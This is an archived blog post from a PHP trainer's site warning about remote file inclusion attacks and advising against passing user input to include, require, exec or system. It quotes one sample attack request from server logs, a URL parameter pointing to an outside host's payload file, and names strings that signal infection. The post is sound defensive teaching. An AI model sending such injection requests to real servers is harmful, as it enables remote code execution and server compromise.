Training, Open Source Programming Languages

Print friendly page
Home Accessibility Courses Twitter The Mouth Facebook Resources Site Map About Us Contact
 
For 2023 (and 2024 ...) - we are now fully retired from IT training.
We have made many, many friends over 25 years of teaching about Python, Tcl, Perl, PHP, Lua, Java, C and C++ - and MySQL, Linux and Solaris/SunOS too. Our training notes are now very much out of date, but due to upward compatability most of our examples remain operational and even relevant ad you are welcome to make us if them "as seen" and at your own risk.

Lisa and I (Graham) now live in what was our training centre in Melksham - happy to meet with former delegates here - but do check ahead before coming round. We are far from inactive - rather, enjoying the times that we are retired but still healthy enough in mind and body to be active!

I am also active in many other area and still look after a lot of web sites - you can find an index ((here))
Injection Attacks - avoiding them in your PHP

"Please help me debug this virus." I'm paraphrasing something that was posted, a long while ago now, on a board I look after ... and I deleted the code pretty darned fast, as I didn't (and still don't) want to form a source of information for the less scrupulous.

I was looking at a few issues on one of our servers earlier today, and found myself looking through page after page of attempted injection attacks, where a rogue visitor to the web site (almost inevitable an automated program) supplies a parameter that's the URL from another site, in the hope that my PHP script will read that other page and run the code therein on my server ... here's an example of the sort of thing (and this one's quite well known, and I have obfuscated it anyway, so I am giving few secrets away)

/phphtml.php?htmlclass_path=http://titureddo.changeview.org/vacanze/vini.txt?

Now ... this issue turned out to be a side shoot of what I was hunting down, but it acts as a timely reminder to be very careful indeed about using PHP's require, include, passthru, exec, system (and that may not be an exhaustive list either) on anything that could remotely be a variable derived from a user input via $_REQUEST and friends.

What's the risk? It's an injection attack (yes, I have the code. No - I am not reproducing it here!) and if it succeeds in finding a hole in your system, chances are (and experiences I have heard of confirm) that it will install itself on your server which will then form a part of the breeding colony ...

How many hack attempts like this are we getting? I estimate it's now thousands per day.

How do I know if I'm infected Well ... if you search your web pages for kangkung or RoxTeam and find something that you didn't know was there ...

Please note that this is just an example of one form of injection attack - this article is not intended to provide a complete of definitive list in any shape or form!
(written 2008-08-31, updated 2008-09-04)

 
Associated topics are indexed as below, or enter http://melksh.am/nnnn for individual articles
H117 - Security in PHP
  [345] Spotting a denial of service attack - (2005-06-12)
  [426] Robust checking of data entered by users - (2005-08-27)
  [920] A lion in a cage - PHP - (2006-11-10)
  [947] What is an SQL injection attack? - (2006-11-27)
  [1052] Learning to write secure, maintainable PHP - (2007-01-25)
  [1086] Injection attacks - safeguard your PHP scripts - (2007-02-20)
  [1323] Easy handling of errors in PHP - (2007-08-27)
  [1387] Error logging to file not browser in PHP - (2007-10-11)
  [1396] Using PHP to upload images / Store on MySQL database - security questions - (2007-10-19)
  [1482] A story about benchmarking PHP - (2007-12-23)
  [1542] Are nasty programs looking for security holes on your server? - (2008-02-17)
  [1679] PHP - Sanitised application principles for security and useability - (2008-06-16)
  [1694] Defensive coding techniques in PHP? - (2008-07-02)
  [1747] Who is watching you? - (2008-08-10)
  [2025] Injection Attack if register_globals in on - PHP - (2009-02-04)
  [2628] An example of an injection attack using Javascript - (2010-02-08)
  [2688] Security considerations in programming - what do we teach? - (2010-03-22)
  [2939] Protecting your images from use out of context - (2010-08-29)
  [3210] Catchable fatal error in PHP ... How to catch, and alternative solutions such as JSON - (2011-03-22)
  [3698] How to stop forms on other sites submitting to your scripts - (2012-04-15)
  [3747] An easy way to comply with the new cookie law if your site is well designed - (2012-06-02)
  [3813] Injection Attacks - PHP, SQL, HTML, Javascript - and how to neutralise them - (2012-07-22)
  [4642] A small teaching program - demonstration of principles only - (2016-02-08)


Back to
Pointing all the web pages in a directory at a database
 Previous and next
or
Horse's mouth home		 Forward to
Server overloading - turns out to be feof in PHP
Some other Articles
Think before you send
Calling procs in Tcl and how it compares to Perl
Reception
Server overloading - turns out to be feof in PHP
Injection Attacks - avoiding them in your PHP
Pointing all the web pages in a directory at a database
The Rise and Rise of First Bus Fares
Does fruit and veg drag on?
Easterholic
What is my real and my effective ID? [Linux]
4759 posts, page by page
Link to page ... 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96 at 50 posts per page


This is a page archived from The Horse's Mouth at http://www.wellho.net/horse/ - the diary and writings of Graham Ellis. Every attempt was made to provide current information at the time the page was written, but things do move forward in our business - new software releases, price changes, new techniques. Please check back via our main site for current courses, prices, versions, etc - any mention of a price in "The Horse's Mouth" cannot be taken as an offer to supply at that price.

Link to Ezine home page (for reading).
Link to Blogging home page (to add comments).
You can Add a comment or ranking to this page

Like this? ??

Related short articles
Real life PHP application using our course training MVC example
Image indexer / thumbnail display scripts in PHP
Testing new algorithms in PHP
Why populate object with values as you construct them?
What are callbacks? Why use them? An example in Python
Caching results in an object for efficiency - avoiding re-calculation
Our best hotel customers help us ... to help them ... be our best customers.
Perl, PHP, Python, Lua, Tcl, C++, Ruby - final public courses for 2015
Function prototype - what they are and why you should use them - C and C++
Adding a PHP build option, rotating an image based on camera data, and a new look at thumbnails in PHP
Refactoring Perl applications to give them a rosy future
What FGW passengers want to talk about / and PHP programming to find out
Object factories in C++, Python, PHP and Perl
PHP - some quick fixes if scripts have issues, and how to use our support
PHP training - refreshed modern course, backed up by years of practical experience
Identifying and clearing denial of service attacks on your Apache server
Python, PHP, Ruby, C, Lua, etc ... course prices held for the rest of 2014
Disambiguation - PHP List
Endorsed Perl, Python and PHP training - Tcl, Lua, Ruby and C too!
Public courses - Python, PHP, Perl, Ruby, Lua, Tcl, C and C++ - autumn 2013 and through 2014
How do I post automatically from a PHP script to my Twitter account?
We not only teach PHP and Python - we teach good PHP and Python Practice!
Teaching CodeIgniter - MVC and PHP
Further recent PHP examples
A comment on comments in PHP
Learning about Object Orientation in PHP - a new set of examples
Splitting the difference with PHP
Setting up strings in PHP
Passing variable between PHP pages - hidden fields, cookies and sessions
Arrays in PHP - contain different and even mixed data types
MVC and Frameworks - a lesson from first principles in PHP
CodeIgniter - an excellent PHP framework with an easy start point
Curl and curling from PHP
stdClass in PHP - using an object rather than an associative array
The PHP course this week is in... Salford
A couple of new fast-start PHP examples
Our examples work with any recent version of PHP
Testing code coverage (have I tested everything?) in PHP
Testing classes for your PHP website with PHPUnit
Zend / layout of MVC and other files in an example application (PHP)
Building up from a small PHP setup to an enterprise one
Objects in PHP - Revision
PHP revision ... by example.
Moving from a warning system to a control system - PHP, forum spammers
Filtering PHP form inputs - three ways, but which should you use?
Multiple page web applications - maintaining state - PHP
PHP variables - dynamically typed. What does that mean?
How does PHP work?
Identifying your real customers and keeping them well informed fast
Copying, duplicating, cloning an object in PHP
Autoload in PHP
Geekmas 2012 - celebrating open source languages such as Perl, PHP and Python
Know Python or PHP? Want to learn Perl too?
PHP sessions - a best practice teaching example
Fpdf - generating .pdf documents easily from your PHP program
More than just matching with a regular expression in PHP
Programming languages - what are the differences between them?
What is a metatable? How do I set one up? How do I use them? Lua
Refresh and Revision training class days - Perl / PHP / Python / Lua / Ruby / Tcl / C / C++
Events in Melksham - read all about them, and tell us about yours
Weak references in Lua - what are they, and why use them?
Design Patterns - what are they? Why use them?
Easy session example in PHP - keeping each customers data apart
Separating program and artwork in PHP - easier maintainance, and better for the user
Learning to program in PHP - Regular Expression and Associative Array examples
December courses - PHP, Python, Perl - and a weekend Lua course
Regular Expression modifiers in PHP - summary table
PHP - moving from ereg to preg for regular expressions
On this day ... one PHP script with three uses
MySQL, MySQLi, PDO or something else - how best to talk to databases from PHP
Your PHP website - how to factor and refactor to reduce growing pains
Divide 10000 by 17. Do you get 588.235294117647, 588.24 or 588? - Ruby and PHP
Tcl packages, pkg_mkIndex, pkgIndex.tcl -what are they and why use them.
What is a namespace and why do we need them?
Do I need to initialise variables - programming in C, C++, Perl, PHP, Python, Ruby or Java.
Computer Graphics in PHP - World (incoming data) to Pixel (screen) conversion
Open Source (Public) courses - PHP, Tcl, SQL, Python, C and C++ in Melksham, Wiltshire, UK
Extra courses - Advanced PHP, MySQL and Lua
Virtual Hosting with Apache http server - an overall scheme, and avoiding common pitfalls
Perl, Python, PHP, Lua, Linux, and more - and business hotel too. Menu for 2011
© WELL HOUSE CONSULTANTS LTD., 2024: 48 Spa Road • Melksham, Wiltshire • United Kingdom • SN12 7NY
PH: 01144 1225 708225 • EMAIL: info@wellho.net • WEB: http://www.wellho.net • SKYPE: wellho

PAGE: http://www.wellho.info/mouth/1779_Inj ... r-PHP.html • PAGE BUILT: Sun Oct 11 16:07:41 2020 • BUILD SYSTEM: JelliaJamb